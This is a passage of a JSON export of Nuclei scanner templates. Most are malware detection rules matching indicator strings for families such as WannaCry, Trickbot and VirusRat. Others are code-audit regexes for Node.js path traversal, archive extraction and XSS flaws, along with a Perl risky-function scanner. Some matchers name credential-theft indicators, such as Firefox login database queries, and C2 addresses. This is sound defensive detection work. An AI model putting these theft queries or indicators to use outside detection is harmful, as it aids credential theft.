\"n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<\"\n condition: and\n\n# digest: 490a004630440220145a23c07dceab65162628617ab1d5f68f98681d263bdd753bbea601d475a39302206cfc0ef865f74a4b2ad37e3b5e0a5a4b6d12eeb49ddcbb2301b47f5d544072f0:922c64590222798bb761d5b6d8e72950\n", "hash": "17bccef4d40034e577e72e228b03ada2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd7" }, "name": "treasurehunt-malware.yaml", "content": "id: treasurehunt-malware\n\ninfo:\n name: Trickbot Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TreasureHunt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"treasureHunter.pdb\"\n - \"jucheck\"\n - \"cmdLineDecrypted\"\n condition: and\n\n# digest: 490a00463044022066ec12589d804e6cdd0ae2549ddb57602345462fd6dee2a09550b9e9a4108068022002ae9874acc7eb50603b2ab47d0c2800183c391cd71b5dbb08f43d95ba4cab26:922c64590222798bb761d5b6d8e72950\n", "hash": "985df2bacf262b172421c082ab44b63c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd8" }, "name": "trickbot-malware.yaml", "content": "id: trickbot-malware\n\ninfo:\n name: Trickbot Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TrickBot.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"moduleconfig\"\n - \"Start\"\n - \"Control\"\n - \"FreeBuffer\"\n - \"Release\"\n condition: and\n\n# digest: 
4a0a004730450220707c3242eb05a2aba17d8a46be0d45921b92677ff74100c7af12a0778cb30dcd022100cb971233ce240fa01df92e4de1552ff5b06cdd9bd1eeeabab7fb7124be816da1:922c64590222798bb761d5b6d8e72950\n", "hash": "e198788980deac0e8400830494bcd459", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd9" }, "name": "trumpbot-malware.yaml", "content": "id: trumpbot-malware\n\ninfo:\n name: TrumpBot Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Trumpbot.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"trumpisdaddy\"\n - \"198.50.154.188\"\n condition: and\n\n# digest: 490a00463044022077686f6a132d9f6022811b59ada2f6e32dc4c3847f849c6c62578d03d11b0fa002202ed35d1b92c92e2fc792b216642c08c92cc9e1a52032828ce2df303909b75f03:922c64590222798bb761d5b6d8e72950\n", "hash": "98e1bbde096a6e025619775722a9f0ea", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dda" }, "name": "universal-1337-malware.yaml", "content": "id: universal-1337-malware\n\ninfo:\n name: Universal 1337 Stealer Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Stealer.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"2A5B532D502D4C2D492D545D2A\"\n - \"2A5B482D452D522D455D2A\"\n condition: and\n\n - type: binary\n binary:\n - \"4654507E\"\n - \"7E317E317E307E30\"\n condition: and\n\n# digest: 490a004630440220397ce50e31990f7aaaf02be33afd37aff4a51d93c9940d61c39cc589194a78f102207ace42ecf66077fe30a11e59a5701dd4cbc00744153c557a103eed243e082eec:922c64590222798bb761d5b6d8e72950\n", "hash": "b8f5230f73c5e4c86ae94dc5741e5363", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddb" }, "name": "unrecom-malware.yaml", "content": "id: 
unrecom-malware\n\ninfo:\n name: Unrecom Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"META-INF\"\n - \"load/ID\"\n - \"load/JarMain.class\"\n - \"load/MANIFEST.MF\"\n - \"plugins/UnrecomServer.class\"\n condition: and\n\n# digest: 490a00463044022061c7bc50067c54621333714d9eb670cd63a90b46af0b387b09efe0d4c7c4068b02203c84c06d9f54cbc723c12be9e4c7960f2eca1c6f126492c098d2b2e9a78b7465:922c64590222798bb761d5b6d8e72950\n", "hash": "85aafb35a7467f8cacbb85bb692fdc50", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddc" }, "name": "urausy-malware.yaml", "content": "id: urausy-malware\n\ninfo:\n name: Urausy Skype Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Urausy.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"skype.dat\"\n - \"skype.ini\"\n - \"CreateWindow\"\n - \"YIWEFHIWQ\"\n - \"CreateDesktop\"\n - \"MyDesktop\"\n condition: and\n\n# digest: 4a0a0047304502207b3b598cd852ee0690d9b13cc9b12860694de99a33231362605d694396de456f022100da377937679673c9a06f1a8c9a4b804226d71c2d0e28eae0a7702f0f2dec74cc:922c64590222798bb761d5b6d8e72950\n", "hash": "c2fce7cba211ed135cdbc7edca14b950", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddd" }, "name": "vertex-malware.yaml", "content": "id: vertex-malware\n\ninfo:\n name: Vertex Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"DEFPATH\"\n - \"HKNAME\"\n - \"HPORT\"\n - \"INSTALL\"\n - \"IPATH\"\n - \"MUTEX\"\n - \"PANELPATH\"\n 
- \"ROOTURL\"\n condition: and\n\n# digest: 4a0a00473045022100cade2b78f128db265e8c5db7004a11d4c7062226687a418ae25d172870f626ec02202aabc9b4786f780667e3863bbe8561528edfd2b957d7ac9b052701e5d5812679:922c64590222798bb761d5b6d8e72950\n", "hash": "682366042b7f31f10aa46bc716be8e26", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dde" }, "name": "virusrat-malware.yaml", "content": "id: virusrat-malware\n\ninfo:\n name: VirusRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"virustotal\"\n - \"virusscan\"\n - \"abccba\"\n - \"pronoip\"\n - \"streamWebcam\"\n - \"DOMAIN_PASSWORD\"\n - \"Stub.Form1.resources\"\n - \"ftp://{0}@{1}\"\n - \"SELECT * FROM moz_logins\"\n - \"SELECT * FROM moz_disabledHosts\"\n - \"DynDNS\\\\Updater\\\\config.dyndns\"\n - \"|BawaneH|\"\n condition: and\n\n# digest: 490a00463044022061bcb47a0873b0588f265a7e601cd05b6bb37ad8e063e592fdd7d903ad4cc0be02202d8867290f2fdd9ab8efecfb3d5fedc3cadfc2dafc41e8a2adef2fbb43b83e1d:922c64590222798bb761d5b6d8e72950\n", "hash": "8c0f47dc477f82cef374e86c868efc6d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddf" }, "name": "wabot-malware.yaml", "content": "id: wabot-malware\n\ninfo:\n name: Warp Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Wabot.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"433A5C6D6172696A75616E612E747874\"\n - \"7349524334\"\n condition: and\n\n# digest: 490a00463044022059b384672714a4093b8f5cfd73c51f240d9ec565c0df7fedd17166c7d2168368022061a1fd229442ae14c76593442382c14c59b2c8a5e27f91ca120691ed31497237:922c64590222798bb761d5b6d8e72950\n", "hash": "fe82881adb138982fae5d92ddb0593aa", "level": 2, 
"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de0" }, "name": "wannacry-malware.yaml", "content": "id: wannacry-malware\n\ninfo:\n name: WannaCry Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_wannacry.yara\n tags: malware,file,wannacry\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"msg/m_chinese\"\n - \".wnry\"\n - \"attrib +h\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"WNcry@2ol7\"\n - \"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\"\n - \"115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn\"\n - \"12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw\"\n - \"13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94\"\n condition: or\n\n# digest: 490a00463044022075f35e75c9f2832f30654ca6b3c0a8ba30466e117d4c4b8f42baa4b0a9ae5a3202203804e16360e6ec92468528804f0e3e34058c9df44c1c1ecc8269b7cfcc84dbc2:922c64590222798bb761d5b6d8e72950\n", "hash": "e6149b685c60c0ad21c5a6a4b283bc6d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de1" }, "name": "warp-malware.yaml", "content": "id: warp-malware\n\ninfo:\n name: Warp Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Warp.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"/2011/n325423.shtml?\"\n - \"wyle\"\n - \"\\\\~ISUN32.EXE\"\n condition: or\n\n - type: binary\n binary:\n - \"80382B7503C6002D80382F7503C6005F\"\n\n# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950\n", "hash": "23afac55b88bdf1f0d7fc6178c8e86f0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de2" }, "name": 
"xhide-malware.yaml", "content": "id: xhide-malware\n\ninfo:\n name: xHide Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XHide.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'XHide - Process Faker'\n - 'Fakename: %s PidNum: %d'\n condition: and\n\n# digest: 4a0a00473045022100de21a884f48a0719bc4f2ee4ef7743dd573ac95eff672f1593fd0645dbd63cb5022027b0a93e2dcd4d005fbd53e222c2377c7aebf23269112986ecf201251c520856:922c64590222798bb761d5b6d8e72950\n", "hash": "5a4701becf9909230069e8708cf9ee2e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de3" }, "name": "xor-ddos-malware.yaml", "content": "id: xor-ddos-malware\n\ninfo:\n name: XOR_DDosv1 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XOR_DDos.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"BB2FA36AAA9541F0\"\n - \"md5=\"\n - \"denyip=\"\n - \"filename=\"\n - \"rmfile=\"\n - \"exec_packet\"\n - \"build_iphdr\"\n condition: and\n\n# digest: 4b0a004830460221008074e35a2ef70400e3e76588c3d1bf60786f1ce420219e884ccffcdc389b1f5e022100fc59177fbc3a832292f57bc0083333fd895d7523e7b40223b169411d1f256f7a:922c64590222798bb761d5b6d8e72950\n", "hash": "53920373af7a6848ec11a6ce47ebc20f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de4" }, "name": "yayih-malware.yaml", "content": "id: yayih-malware\n\ninfo:\n name: Yayih Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Yayih.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"/bbs/info.asp\"\n - \"\\\\msinfo.exe\"\n - \"%s\\\\%srcs.pdf\"\n - \"\\\\aumLib.ini\"\n 
condition: or\n\n - type: binary\n binary:\n - \"8004087A03C18B45FC8034081903C1413B0A7CE9\"\n\n# digest: 4a0a00473045022100f21491da53356e83942c2502eae399b18e503026b04fd6a04d7e3d666c6253f802207d7efabac7623bd14bff67a913e9bbf35fc19504e5bda37c3a3e350c719ead77:922c64590222798bb761d5b6d8e72950\n", "hash": "e9b6a172b045e64ad3f8df57ba2ce95f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de5" }, "name": "zeghost-malware.yaml", "content": "id: zeghost-malware\n\ninfo:\n name: Zegost Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Zegost.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - '392F6633304C693575624F35444E414444784738733736327471593D'\n - '00BADA2251426F6D6500'\n condition: and\n\n# digest: 4a0a00473045022037003aa20e994bc79289f19bc0e22ad52153ad14777b74ad17e88141d20454d10221008e9f88d8819669098597631e9d0a9745c5330e9b8a255b6036a0e8d653c6fcd9:922c64590222798bb761d5b6d8e72950\n", "hash": "3821a122f6e055bd732df5d527f5cefa", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de6" }, "name": "zoxpng-malware.yaml", "content": "id: zoxpng-malware\n\ninfo:\n name: ZoxPNG Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_ZoxPNG.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58\"\n\n# digest: 4b0a00483046022100c9c4e20dcdb3d7419d7e4531d93ebd22b25c13131c670da3f6e4ad98db8457a2022100c52254e4826289e996691e927c8afc58a2421da3603b993852f3ee2205b2c7c8:922c64590222798bb761d5b6d8e72950\n", "hash": "6c14e35d6cb56347c7736167f1b798c2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307de7" }, "name": "zrypt-malware.yaml", "content": "id: zrypt-malware\n\ninfo:\n name: Zcrypt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara\n tags: malware,file,zrypt\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"How to Buy Bitcoins\"\n - \"ALL YOUR PERSONAL FILES ARE ENCRYPTED\"\n - \"Click Here to Show Bitcoin Address\"\n - \"MyEncrypter2.pdb\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \".p7b\"\n - \".p7c\"\n - \".pdd\"\n - \".pef\"\n - \".pem\"\n - \"How to decrypt files.html\"\n condition: and\n\n# digest: 490a004630440220505b7b0359dfc00b9f7d9f9a654fa51b862140381c8785ca1f1d04cd4ba7f1f00220194afc36d15fcaef2fc487ce83de91edf5ff902675b4c0f06f016c8c7574e74c:922c64590222798bb761d5b6d8e72950\n", "hash": "605b957a61c347a228a6ac2151916003", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de8" }, "name": "admzip-path-overwrite.yaml", "content": "id: admzip-path-overwrite\n\ninfo:\n name: Admzip Path Overwrite\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Insecure ZIP archive extraction using adm-zip can result in arbitrary path over write and can result in code injection.\n tags: file,nodejs,admzip\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"require\\\\\\\\('adm-zip'\\\\\\\\)\"\n - \"\\\\.forEach\\\\(function .*\\\\(.*, \\\\.\\\\*\\\\) \\\\{\"\n - \"\\\\.createWriteStream\\\\(.*\\\\) \\\\}, \\\\.\\\\*\\\\)\"\n - \"\\\\.writeFile\\\\(.*\\\\)\"\n - \"\\\\.writeFileSync\\\\(.*\\\\) \\\\}, \\\\.\\\\*\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100d3f3fb61dfc42f08f4a89b791f5374e788d8d917e8c701876ebdf5f946e9a559022100a68b85ca82e5fc59479c77c56d1c3abdda513d5863ada63ba5b37d0b5ad5ae94:922c64590222798bb761d5b6d8e72950\n", "hash": 
"0c34ef9623485c01b75133aad2a9bd2c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de9" }, "name": "express-lfr.yaml", "content": "id: express-lfr\n\ninfo:\n name: Express - Local File Read\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Untrusted user input in express render() function can result in arbitrary file read if hbs templating is used.\n tags: file,nodejs,express,lfr\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"(\\\\$[\\\\w\\\\W]+?)\\\\.render\\\\(\\\\$[\\\\w\\\\W]+?, <[\\\\w\\\\W]+? \\\\\\\\$[\\\\w\\\\W]+? [\\\\w\\\\W]+? >\\\\)\"\n - \"(\\\\$[\\\\w\\\\W]+?)\\\\.render\\\\(\\\\$[\\\\w\\\\W]+?, <[\\\\w\\\\W]+? \\\\\\\\$[\\\\w\\\\W]+?\\\\.\\\\$[\\\\w\\\\W]+? [\\\\w\\\\W]+? >\\\\)\"\n - \"(\\\\$[\\\\w\\\\W]+?)\\\\.render\\\\(\\\\$[\\\\w\\\\W]+?, <[\\\\w\\\\W]+? \\\\\\\\$[\\\\w\\\\W]+? [\\\\w\\\\W]+? >\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100e7798827d9cc0ed3a27739501621560cd2752e52aba95d220252540f0361afeb022100a8c14ce89e7beca1fb0c19891d37761ed32e3c096e6033a2c2d4a1b77f1a49f6:922c64590222798bb761d5b6d8e72950\n", "hash": "098cc5c043fe8dccb3584bae9b934887", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dea" }, "name": "generic-path-traversal.yaml", "content": "id: generic-path-traversal\n\ninfo:\n name: Generic - Path Traversal\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Untrusted user input in readFile()/readFileSync() can endup in Directory Traversal Attacks.\n tags: file,nodejs\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"[^\\\\.]*\\\\.createReadStream\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n - \"[^\\\\.]*\\\\.readFile\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n - \"[^\\\\.]*\\\\.readFileSync\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n - 
\"[^\\\\.]*\\\\.readFileAsync\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100e21a018d792fd5746301590fee7667c09666ad26347732653bdf90db09245f150221008bddd8b9b51c116885885104f24ed7cda9f5ba500680a85415390a22c4584a8b:922c64590222798bb761d5b6d8e72950\n", "hash": "7c6e3ba2d062402e5213da0f83b57867", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307deb" }, "name": "tar-path-overwrite.yaml", "content": "id: tar-extraction\n\ninfo:\n name: Path Injection Vulnerability in TAR Extraction\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Insecure TAR archive extraction can result in arbitrary path over write and can result in code injection.\n tags: file,nodejs\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"require\\\\('tar-stream'\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.createWriteStream\\\\([\\\\w\\\\W]*?\\\\, [\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFile\\\\([\\\\w\\\\W]*?\\\\, [\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFileSync\\\\([\\\\w\\\\W]*?\\\\, [\\\\w\\\\W]*?\\\\)\"\n condition: or\n\n# digest: 490a0046304402207e72208a1944e7df2a904fe5c6f0286522d073ca069018194bf4e461a96c7f030220657b4086fb9b504fdfd3ee97fe79018b05f66382b367ba76d019e1d3e0a61c82:922c64590222798bb761d5b6d8e72950\n", "hash": "0c7518f5b2b95e1f1cd022c53c1d8088", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dec" }, "name": "xss-disable-mustache-escape.yaml", "content": "id: xss-disable-mustache-escape\n\ninfo:\n name: XSS Disable Mustache Escape\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Markup escaping disabled. 
This can be used with some template engines to escape disabling of HTML entities, which can lead to XSS attacks.\n tags: file,nodejs,mustache,xss\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"[\\\\w\\\\W]+?\\\\.escapeMarkup = false\"\n\n# digest: 4a0a00473045022041c26d15e30a67da51faf8296e3dcfa26d1debb48e546df53fd49950ac2755bc022100ba0c25be763311d27fd4b84f86a184a622246c44589a783faac58165f161b5c9:922c64590222798bb761d5b6d8e72950\n", "hash": "2e828e4f3e3af09082ed23dde6566288", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ded" }, "name": "xss-serialize-javascript.yaml", "content": "id: xss-serialize-javascript\n\ninfo:\n name: XSS Serialize Javascript\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Untrusted user input reaching `serialize-javascript` with `unsafe` attribute can cause Cross Site Scripting (XSS).\n tags: file,nodejs,serialize,xss\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"require\\\\('serialize-javascript'\\\\)\"\n - \"\\\\$S\\\\(\\\\.\\\\*?, \\\\{unsafe: true\\\\}\\\\)\"\n condition: or\n\n - type: regex\n negative: true\n regex:\n - \"escape\\\\(.*?\\\\)\"\n - \"encodeURI\\\\(.*?\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100c969127d5164e847745c08918d013ec03653d1ebd3df975a2ebba346eabc86ca022100eb6452e18b4c019fede7e45505c43395c0a854ec7842beb502dfed933b126877:922c64590222798bb761d5b6d8e72950\n", "hash": "39067abfb578d38dd60f7f1fd2d83861", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dee" }, "name": "zip-path-overwrite.yaml", "content": "id: zip-path-overwrite\n\ninfo:\n name: Zip Path Overwrite\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Insecure ZIP archive extraction can result in arbitrary path overwrite and can result in code injection.\n tags: file,nodejs\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n 
regex:\n - \"require\\\\('unzip'\\\\)\"\n - \"require\\\\('unzipper'\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.Parse\\\\([\\\\w\\\\W]*?\\\\)\\\\)\\\\.on\\\\('entry', function [\\\\w\\\\W]*?\\\\([\\\\w\\\\W]*?\\\\) \\\\{\"\n - \"[\\\\w\\\\W]+? = [\\\\w\\\\W]+?\\\\.indexOf\\\\([\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.createWriteStream\\\\([\\\\w\\\\W]*?\\\\)\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.writeFile\\\\([\\\\w\\\\W]*?\\\\)\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.writeFileSync\\\\([\\\\w\\\\W]*?\\\\)\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.Parse\\\\([\\\\w\\\\W]*?\\\\)\\\\.on\\\\('entry', function [\\\\w\\\\W]*?\\\\([\\\\w\\\\W]*?\\\\) \\\\{\"\n - \"[\\\\w\\\\W]+?\\\\.createWriteStream\\\\([\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFile\\\\([\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFileSync\\\\([\\\\w\\\\W]*?\\\\)\"\n condition: or\n\n# digest: 4a0a00473045022047f3632b4b629a718f03f122923ecb7a440173d05eff63495de945c7eecaa959022100c898c664cdbf7a53469f2d4f41fb76df1580af59737082875247e0e42a4d70c8:922c64590222798bb761d5b6d8e72950\n", "hash": "d1348c696b70784068138833488eec9b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307def" }, "name": "perl-scanner.yaml", "content": "id: perl-scanner\n\ninfo:\n name: Perl File Scanner\n author: geeknik\n severity: info\n tags: perl,file\nfile:\n - extensions:\n - pl # default\n - perl # uncommon\n - pod # plain old documentation\n - pm # perl module\n - cgi # common gateway interface\n\n extractors:\n - type: regex\n # Standard random number generators should not be used to generate randomness used for security reasons. 
For security sensitive randomness a cryptographic randomness generator that provides sufficient entropy should be used.\n regex:\n - 'srand'\n - 'rand'\n\n - type: regex\n regex:\n - 'getc'\n - 'readdir'\n - 'read'\n - 'sysread'\n\n - type: regex\n # When using exec, it is important to be sure that the string being used does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave strangely.\n regex:\n - 'exec'\n\n - type: regex\n # The filehandle argument should not be derived from user input. Doing so could allow arbitrary filehandles to have operations carried out on them.\n regex:\n - 'fcntl'\n\n - type: regex\n # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice.\n regex:\n - 'bind'\n\n - type: regex\n # When using setpgrp, neither argument should be derived from user input, doing so may allow the attacker to modify both the PID and the PGRP argument, possibly allowing arbitrary processes to have their process group changed.\n regex:\n - 'setpgrp'\n\n - type: regex\n # When using setpriority, do not pass arguments to it that are derived from user input. Doing so could allow an attacker to set the priority of an arbitrary process on the system.\n regex:\n - 'setpriority'\n\n - type: regex\n # Care should be exercised when using the syscall function. Arguments derived from user input are to be avoided, and are especially dangerous due to the fact they are passed directly to the underlying OS call. There is also a potential for buffer-overflow like problems with strings that may be written to. Extend all perl strings to sane lengths before passing them into this function.\n regex:\n - 'syscall'\n\n - type: regex\n # The second argument specifying the packed address to bind to, should not be derived from user input. 
If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data.\n regex:\n - 'connect'\n\n - type: regex\n # When using system, it is important to be sure that the string being used does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave strangely. It is also imperative to insure the string has no characters that may be interpreted by the shell, possibly allowing arbitrary commands to be run.\n regex:\n - 'system'\n\n - type: regex\n # The filename argument of open should be carefully checked if it is being created with any user-supplied string as a component of it. Strings should be checked for occurrences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a \"|\", as this will cause the path to be executed.\n regex:\n - 'open'\n\n - type: regex\n # When using this function, it is important to be sure that the string being passed in does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave in ways you do not expect. This is especially important if the string is in any way constructed from a user supplied value.\n regex:\n - 'mkdir'\n - 'chdir'\n - 'rmdir'\n - 'chown'\n - 'chmod'\n - 'link'\n - 'symlink'\n - 'truncate'\n - 'chroot'\n\n - type: regex\n # Using a user supplied expression as an argument to this function should be avoided. Explicitly set the umask to a value you know is safe.\n regex:\n - 'umask'\n\n - type: regex\n # Avoid constructing the list of process ids to kill with any strings that contain user inputted data. 
